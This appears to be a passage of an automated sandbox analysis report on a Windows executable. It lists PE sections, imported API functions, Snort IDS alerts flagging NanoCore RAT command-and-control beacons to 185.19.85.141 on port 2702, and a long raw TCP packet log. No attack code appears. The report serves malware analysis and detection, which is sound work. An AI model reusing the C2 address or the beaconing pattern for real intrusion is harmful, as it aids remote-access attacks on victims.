.text	0x1000	0x6676	0x6800	False	0.656813401442	data	6.41745998719	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x139a	0x1400	False	0.4498046875	data	5.14106681717	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x20378	0x600	False	0.509765625	data	4.11058212765	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata	0x2b000	0x10000	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x3b000	0xa50	0xc00	False	0.402018229167	data	4.18462166815	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x3b190	0x2e8	data	English	United States
RT_DIALOG	0x3b478	0x100	data	English	United States
RT_DIALOG	0x3b578	0x11c	data	English	United States
RT_DIALOG	0x3b698	0x60	data	English	United States
RT_GROUP_ICON	0x3b6f8	0x14	data	English	United States
RT_MANIFEST	0x3b710	0x33e	XML 1.0 document, ASCII text, with very long lines, with no line terminators	English	United States

Imports

DLL	Import
ADVAPI32.dll	RegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
SHELL32.dll	SHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
ole32.dll	OleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
COMCTL32.dll	ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll	GetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
GDI32.dll	SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
KERNEL32.dll	GetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.3185.19.85.1414977627022816766 05/17/22-12:14:39.410802	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49776	2702	192.168.2.3	185.19.85.141
192.168.2.3185.19.85.1414976827022025019 05/17/22-12:14:22.484039	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49768	2702	192.168.2.3	185.19.85.141
192.168.2.3185.19.85.1414976627022816766 05/17/22-12:14:10.385891	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49766	2702	192.168.2.3	185.19.85.141
192.168.2.3185.19.85.1414975327022816766 05/17/22-12:13:17.032873	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49753	2702	192.168.2.3	185.19.85.141
192.168.2.3185.19.85.1414976127022025019 05/17/22-12:13:48.368799	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49761	2702	192.168.2.3	185.19.85.141
192.168.2.3185.19.85.1414975827022025019 05/17/22-12:13:28.167370	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49758	2702	192.168.2.3	185.19.85.141
192.168.2.3185.19.85.1414976327022816766 05/17/22-12:14:04.353308	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49763	2702	192.168.2.3	185.19.85.141
192.168.2.3185.19.85.1414974627022816766 05/17/22-12:13:08.303726	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49746	2702	192.168.2.3	185.19.85.141
192.168.2.3185.19.85.1414977427022025019 05/17/22-12:14:28.783170	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49774	2702	192.168.2.3	185.19.85.141
192.168.2.3185.19.85.1414975927022025019 05/17/22-12:13:35.677991	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49759	2702	192.168.2.3	185.19.85.141
192.168.2.3185.19.85.1414976227022025019 05/17/22-12:13:55.935835	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49762	2702	192.168.2.3	185.19.85.141
192.168.2.3185.19.85.1414975927022816766 05/17/22-12:13:37.610009	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49759	2702	192.168.2.3	185.19.85.141
185.19.85.141192.168.2.32702497772841753 05/17/22-12:14:49.052826	TCP	2841753	ETPRO TROJAN NanoCore RAT Keep-Alive Beacon (Inbound)	2702	49777	185.19.85.141	192.168.2.3
192.168.2.3185.19.85.1414974627022816718 05/17/22-12:13:08.062740	TCP	2816718	ETPRO TROJAN NanoCore RAT Keep-Alive Beacon	49746	2702	192.168.2.3	185.19.85.141
192.168.2.3185.19.85.1414976027022816766 05/17/22-12:13:43.986891	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49760	2702	192.168.2.3	185.19.85.141
192.168.2.3185.19.85.1414976627022816718 05/17/22-12:14:09.332904	TCP	2816718	ETPRO TROJAN NanoCore RAT Keep-Alive Beacon	49766	2702	192.168.2.3	185.19.85.141
192.168.2.3185.19.85.1414974627022025019 05/17/22-12:13:06.238856	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49746	2702	192.168.2.3	185.19.85.141
192.168.2.3185.19.85.1414977427022816766 05/17/22-12:14:31.555929	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49774	2702	192.168.2.3	185.19.85.141
192.168.2.3185.19.85.1414975327022025019 05/17/22-12:13:12.793529	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49753	2702	192.168.2.3	185.19.85.141
192.168.2.3185.19.85.1414974327022025019 05/17/22-12:13:00.042311	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49743	2702	192.168.2.3	185.19.85.141
192.168.2.3185.19.85.1414976327022025019 05/17/22-12:14:02.189654	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49763	2702	192.168.2.3	185.19.85.141
192.168.2.3185.19.85.1414976827022816766 05/17/22-12:14:24.492812	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49768	2702	192.168.2.3	185.19.85.141
192.168.2.3185.19.85.1414975827022816766 05/17/22-12:13:30.051681	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49758	2702	192.168.2.3	185.19.85.141
192.168.2.3185.19.85.1414976127022816766 05/17/22-12:13:50.122915	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49761	2702	192.168.2.3	185.19.85.141
192.168.2.3185.19.85.1414976627022025019 05/17/22-12:14:08.849775	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49766	2702	192.168.2.3	185.19.85.141
192.168.2.3185.19.85.1414977627022025019 05/17/22-12:14:37.723918	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49776	2702	192.168.2.3	185.19.85.141
192.168.2.3185.19.85.1414977727022816766 05/17/22-12:14:44.772947	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49777	2702	192.168.2.3	185.19.85.141
192.168.2.3185.19.85.1414976727022816766 05/17/22-12:14:17.723901	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49767	2702	192.168.2.3	185.19.85.141
192.168.2.3185.19.85.1414975727022025019 05/17/22-12:13:21.755444	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49757	2702	192.168.2.3	185.19.85.141
192.168.2.3185.19.85.1414976027022025019 05/17/22-12:13:42.065696	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49760	2702	192.168.2.3	185.19.85.141
192.168.2.3185.19.85.1414975727022816766 05/17/22-12:13:23.742694	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49757	2702	192.168.2.3	185.19.85.141
192.168.2.3185.19.85.1414976227022816766 05/17/22-12:13:57.882898	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49762	2702	192.168.2.3	185.19.85.141
192.168.2.3185.19.85.1414976727022025019 05/17/22-12:14:15.714757	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49767	2702	192.168.2.3	185.19.85.141
185.19.85.141192.168.2.32702497582810290 05/17/22-12:13:29.940778	TCP	2810290	ETPRO TROJAN NanoCore RAT Keepalive Response 1	2702	49758	185.19.85.141	192.168.2.3
192.168.2.3185.19.85.1414974327022816766 05/17/22-12:13:01.734611	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49743	2702	192.168.2.3	185.19.85.141
192.168.2.3185.19.85.1414977727022025019 05/17/22-12:14:43.866227	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49777	2702	192.168.2.3	185.19.85.141

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 17, 2022 12:12:58.956697941 CEST	49743	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:12:59.160536051 CEST	2702	49743	185.19.85.141	192.168.2.3
May 17, 2022 12:12:59.160729885 CEST	49743	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:00.042310953 CEST	49743	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:00.287528992 CEST	2702	49743	185.19.85.141	192.168.2.3
May 17, 2022 12:13:00.287609100 CEST	49743	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:00.353543997 CEST	2702	49743	185.19.85.141	192.168.2.3
May 17, 2022 12:13:00.353671074 CEST	49743	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:00.522655964 CEST	2702	49743	185.19.85.141	192.168.2.3
May 17, 2022 12:13:00.522788048 CEST	49743	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:00.602818012 CEST	2702	49743	185.19.85.141	192.168.2.3
May 17, 2022 12:13:00.702936888 CEST	2702	49743	185.19.85.141	192.168.2.3
May 17, 2022 12:13:00.703044891 CEST	49743	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:00.935748100 CEST	2702	49743	185.19.85.141	192.168.2.3
May 17, 2022 12:13:00.935895920 CEST	49743	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:01.186919928 CEST	2702	49743	185.19.85.141	192.168.2.3
May 17, 2022 12:13:01.187096119 CEST	49743	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:01.734611034 CEST	49743	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:01.863965034 CEST	49743	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:01.922688007 CEST	2702	49743	185.19.85.141	192.168.2.3
May 17, 2022 12:13:01.922936916 CEST	49743	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:02.054430962 CEST	2702	49743	185.19.85.141	192.168.2.3
May 17, 2022 12:13:02.054537058 CEST	49743	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:06.023225069 CEST	49746	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:06.237549067 CEST	2702	49746	185.19.85.141	192.168.2.3
May 17, 2022 12:13:06.237700939 CEST	49746	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:06.238856077 CEST	49746	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:06.473557949 CEST	2702	49746	185.19.85.141	192.168.2.3
May 17, 2022 12:13:06.473676920 CEST	49746	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:06.713401079 CEST	2702	49746	185.19.85.141	192.168.2.3
May 17, 2022 12:13:06.713510990 CEST	49746	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:06.959625006 CEST	2702	49746	185.19.85.141	192.168.2.3
May 17, 2022 12:13:06.959933996 CEST	49746	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:07.212682009 CEST	2702	49746	185.19.85.141	192.168.2.3
May 17, 2022 12:13:07.212876081 CEST	49746	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:07.453071117 CEST	2702	49746	185.19.85.141	192.168.2.3
May 17, 2022 12:13:07.453197002 CEST	49746	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:07.692661047 CEST	2702	49746	185.19.85.141	192.168.2.3
May 17, 2022 12:13:07.692796946 CEST	49746	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:07.824592113 CEST	2702	49746	185.19.85.141	192.168.2.3
May 17, 2022 12:13:07.824865103 CEST	49746	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:07.934544086 CEST	2702	49746	185.19.85.141	192.168.2.3
May 17, 2022 12:13:07.934643030 CEST	49746	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:08.062591076 CEST	2702	49746	185.19.85.141	192.168.2.3
May 17, 2022 12:13:08.062740088 CEST	49746	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:08.139667034 CEST	2702	49746	185.19.85.141	192.168.2.3
May 17, 2022 12:13:08.235142946 CEST	49746	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:08.303575039 CEST	2702	49746	185.19.85.141	192.168.2.3
May 17, 2022 12:13:08.303725958 CEST	49746	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:08.471884966 CEST	49746	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:08.552557945 CEST	2702	49746	185.19.85.141	192.168.2.3
May 17, 2022 12:13:08.552649975 CEST	49746	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:12.610872030 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:12.792789936 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:12.792980909 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:12.793529034 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:13.042582989 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:13.042685986 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:13.124342918 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:13.124468088 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:13.280760050 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:13.280884027 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:13.365154982 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:13.497915030 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:13.500196934 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:13.730475903 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:13.871195078 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:14.121586084 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:14.122246027 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:14.354686975 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:14.354851007 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:14.585453033 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:14.585588932 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:14.832504988 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:14.832653046 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.082676888 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.089975119 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.090719938 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.090826035 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.091840982 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.092984915 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.093141079 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.272936106 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.273741961 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.273927927 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.274801016 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.279911995 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.280157089 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.280900955 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.282109022 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.282471895 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.287553072 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.287585020 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.287705898 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.463018894 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.463833094 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.463953018 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.464804888 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.464838982 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.464975119 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.465828896 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.466823101 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.466939926 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.467859030 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.477097988 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.477159977 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.477204084 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.477258921 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.477619886 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.477680922 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.477683067 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.477756977 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.478621006 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.478729010 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.478811026 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.478851080 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.478924990 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.478991032 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.652908087 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.653852940 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.653948069 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.654798985 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.655013084 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.655082941 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.657016039 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.657601118 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.657711029 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.658026934 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.658067942 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.658138037 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.666873932 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.670136929 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.670238018 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.670277119 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.670331001 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.670378923 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.670532942 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.670595884 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.670650005 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.670690060 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.670876980 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.670941114 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.670985937 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.671030045 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.671081066 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.671137094 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.671262980 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.671324968 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.671413898 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.671960115 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.672032118 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.672441006 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.677850008 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.677947998 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.677972078 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.678061008 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.678128004 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.678258896 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.678386927 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.678458929 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.678615093 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.678809881 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.678867102 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.679028034 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.679117918 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.679183960 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.793663025 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.842890978 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.843112946 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.843830109 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.844014883 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.844785929 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.844928980 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.845777035 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.845892906 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.846046925 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.846107960 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.846714020 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.846784115 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.847735882 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.847893953 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.848836899 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.848865032 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.849030018 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.850061893 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.850167990 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.850811958 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.850915909 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.851819038 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.851917028 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.851924896 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.851984024 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.853132963 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.853240967 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.859148979 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.859245062 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.859338999 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.859385014 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.859417915 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.859479904 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.859581947 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.859685898 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.859731913 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.859781981 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.859872103 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.859930038 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.860152006 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.860229015 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.860388994 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.860464096 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.860897064 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.860975027 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.861399889 CEST	2702	49753	185.19.85.141	192.168.2.3
May 17, 2022 12:13:15.861504078 CEST	49753	2702	192.168.2.3	185.19.85.141
May 17, 2022 12:13:15.861725092 CEST	2702	49753	185.19.85.141	192.168.2.3
